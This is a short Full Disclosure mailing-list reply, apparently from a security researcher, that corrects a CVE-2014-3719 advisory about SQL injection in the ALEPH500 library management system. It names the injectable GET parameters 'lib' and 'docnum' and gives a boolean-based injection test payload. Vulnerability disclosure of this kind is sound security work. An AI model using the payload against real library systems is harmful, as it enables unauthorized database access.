Re: [FD] [CVE-2014-3719] ALEPH500 (Integrated librarymanagement system) SQL Injection

Sun, 18 May 2014 17:48:13 -0700



Greetings:


Oh very feel shy, injection parameter "lib, docnum"

[0] place: GET, parameter: docnum, type: Single quoted string (default)

[1] place: GET, parameter: lib, type: Single quoted string

Replace "lib, docnum" parameter value with "AND 6012=6012AND'SM'='SM'"

Could you update information. Thank you.



Shady.liu

DBAppSecurity Co.Ltd.
-------------------------------------------------------------------------

Email:shady....@dbappsecurity.com.cn
----------------------------------------------------------


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Reply via email to